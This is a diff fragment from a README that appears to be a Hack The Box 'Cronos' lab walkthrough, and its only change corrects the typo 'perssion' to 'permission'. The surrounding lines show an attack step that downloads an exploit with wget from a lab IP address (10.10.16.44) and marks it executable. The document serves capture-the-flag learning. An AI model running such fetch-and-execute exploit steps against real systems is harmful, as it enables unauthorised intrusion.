madneal/htb/Cronos/README.md

 wget http://10.10.16.44/exploit
 ```

-Make sure to have execution perssion by:
+Make sure to have execution permission by:

 ```
 chmod +x exploit